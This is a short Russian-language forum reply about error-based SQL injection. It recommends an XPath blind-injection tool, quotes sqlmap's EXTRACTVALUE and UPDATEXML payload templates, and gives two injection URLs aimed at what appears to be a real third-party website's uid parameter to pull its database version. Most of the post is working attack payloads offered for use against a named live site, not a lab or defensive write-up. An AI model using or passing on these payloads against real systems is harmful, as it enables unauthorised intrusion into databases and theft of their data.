18.11.2015, 22:00
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от psihoz26
↑
нет не работает он с XPath inj.
Юзай Xpath blind explorer. Он кривой но хоть чтото. Если будут проблемы - пишите помогу.
Вот выдержка из реализации payloads в sqlmap:
Сообщение от None
OR
EXTRACTVALUE
([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
..............
AND
UPDATEXML
([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
вот примеры функций что юзаются:
_ttp://staynaughty.com/wall.php?uid=442+or( ExtractValue(1,version()))
_ttp://staynaughty.com/wall.php?uid=442+or( UPDATEXML(1,version(),2))
|
|
|